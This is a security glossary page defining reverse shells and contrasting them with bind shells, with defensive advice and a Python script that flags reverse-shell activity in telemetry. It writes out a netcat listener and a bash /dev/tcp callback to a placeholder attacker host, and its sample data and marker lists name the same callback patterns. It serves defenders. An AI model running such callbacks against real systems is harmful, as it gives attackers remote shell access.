Lateral Movement · Term

What is a reverse shell?

A reverse shell makes the compromised machine connect back to the attacker and hands over a command shell. It is the usual way attackers obtain interactive access to a host behind a firewall, because the connection is opened from the inside. Here is what it is and how it works.

TL;DR

A reverse shell is a shell session where the compromised machine connects out to the attacker and gives them command-line control, rather than the attacker connecting in. It is popular because outbound connections usually pass through firewalls that block inbound ones. The attacker runs a listener and triggers a small command on the target that calls back. It contrasts with a bind shell, where the target listens and the attacker connects in.

By John Dill, Red Team Lead, SecureLayer7

What a reverse shell is

When an attacker runs code on a target, they want an interactive shell. There are two directions:

  • A bind shell opens a listening port on the target and waits for the attacker to connect in.
  • A reverse shell makes the target connect out to the attacker, who is already listening, and pipes a shell over that connection.

Reverse shells dominate because firewalls and NAT usually allow outbound connections while blocking unsolicited inbound ones, so the callback succeeds where an inbound connection to a bind shell would be dropped before it reached the target.

How it works and payload

The attacker starts a listener, then triggers the callback on the target:

  • Listener (attacker): nc -lvnp 443
  • Linux target callback: bash -i >& /dev/tcp/ATTACKER-IP/443 0>&1
  • Alternatives: python3 -c 'import socket,subprocess,os;...', or a nc / mkfifo one-liner.
  • Windows target: a PowerShell TCP client that pipes a shell back to the listener.

Once the callback lands, the attacker has an interactive shell on the target, running with the privileges of the process that executed the command. These are documented techniques, shown so defenders can recognise them.

How to defend

  • Restrict egress (outbound) traffic with a firewall so hosts cannot connect to arbitrary internet addresses and ports; allow only the destinations each host needs and route the rest through a proxy that can be logged.
  • Use application allow-listing to stop unexpected interpreters and tools (shells, scripting runtimes, netcat-style utilities) from running.
  • Monitor for unusual outbound connections, especially those owned by a shell or interpreter whose parent is a web server or other service process.
  • Segment so a host that does get a reverse shell cannot reach much else (limits pivoting).
  • Patch and harden the entry points (command injection, file upload, deserialisation and similar flaws) that let an attacker run the initial command.
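The monitoring and egress points above, turned into detection logic as an added example (not the page's or any vendor's code). The event format, the sample events and the egress allow-list are constructed for the example; map the field names onto whatever your EDR, auditd or Sysmon pipeline actually emits. Three rules are applied to each event: a shell spawned by a service process, a shell owning an outbound connection to a destination outside the egress policy, and a command line carrying one of the callback fragments shown on this page.

```python
"""Flag reverse-shell behaviour in process/network telemetry.

Added example. Event fields (ts, host, parent, proc, cmdline, dst) and the
SAMPLE_EVENTS list are constructed; ALLOWED_EGRESS is an assumed policy.
"""
import ipaddress

# Shells and interpreters an attacker would pipe over a socket.
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl",
          "nc", "ncat", "socat", "powershell.exe", "pwsh"}
# Parents that should not normally be spawning a shell at all.
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "tomcat", "w3wp.exe"}
# Assumed egress policy: internal ranges plus one update mirror are permitted.
ALLOWED_EGRESS = [ipaddress.ip_network("10.0.0.0/8"),
                  ipaddress.ip_network("198.51.100.7/32")]
# Command-line fragments of the callback styles the page lists
# (bash /dev/tcp, mkfifo+nc, nc -e, PowerShell TCP client).
CALLBACK_MARKERS = ("/dev/tcp/", "mkfifo", "-e /bin/", "Net.Sockets.TCPClient")

# Constructed telemetry: one web-server callback, one tomcat child shell,
# and three benign events that must not fire.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:01Z", "host": "web01", "parent": "apache2", "proc": "bash",
     "cmdline": "bash -i >& /dev/tcp/203.0.113.5/443 0>&1", "dst": "203.0.113.5:443"},
    {"ts": "2024-05-01T10:00:05Z", "host": "web01", "parent": "cron", "proc": "sh",
     "cmdline": "sh /opt/backup.sh", "dst": None},
    {"ts": "2024-05-01T10:01:10Z", "host": "app02", "parent": "systemd", "proc": "python3",
     "cmdline": "python3 /opt/app/worker.py", "dst": "10.0.5.20:5432"},
    {"ts": "2024-05-01T10:02:30Z", "host": "app02", "parent": "tomcat", "proc": "sh",
     "cmdline": "sh -c \"mkfifo /tmp/f\"", "dst": None},
    {"ts": "2024-05-01T10:03:00Z", "host": "app02", "parent": "bash", "proc": "curl",
     "cmdline": "curl -s https://mirror.example/updates", "dst": "198.51.100.7:443"},
]


def egress_allowed(dst):
    """True if the destination 'ip:port' falls inside the egress policy."""
    ip = ipaddress.ip_address(dst.rsplit(":", 1)[0])
    return any(ip in net for net in ALLOWED_EGRESS)


def analyse(event):
    """Return the list of rule names the event trips (empty if benign)."""
    proc = event["proc"].lower()
    parent = event["parent"].lower()
    cmd = event.get("cmdline", "")
    dst = event.get("dst")
    findings = []
    if proc in SHELLS and parent in SERVICE_PARENTS:
        findings.append("shell-from-service")
    if proc in SHELLS and dst and not egress_allowed(dst):
        findings.append("shell-egress-denied")
    if any(marker in cmd for marker in CALLBACK_MARKERS):
        findings.append("callback-pattern")
    return findings


def triage(events):
    """Keep only events with findings, as (ts, host, findings) tuples."""
    hits = []
    for event in events:
        findings = analyse(event)
        if findings:
            hits.append((event["ts"], event["host"], findings))
    return hits


if __name__ == "__main__":
    for ts, host, findings in triage(SAMPLE_EVENTS):
        print(ts, host, ", ".join(findings))
```

The first rule is the cheapest and most reliable of the three: web and application servers have no business spawning a shell, so an alert on that parent/child pair catches reverse shells regardless of which one-liner was used. The egress rule only works once the policy in the first bullet exists, and the marker rule is trivially evaded by an attacker who rewrites the command, so treat it as a low-cost extra rather than the main control.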
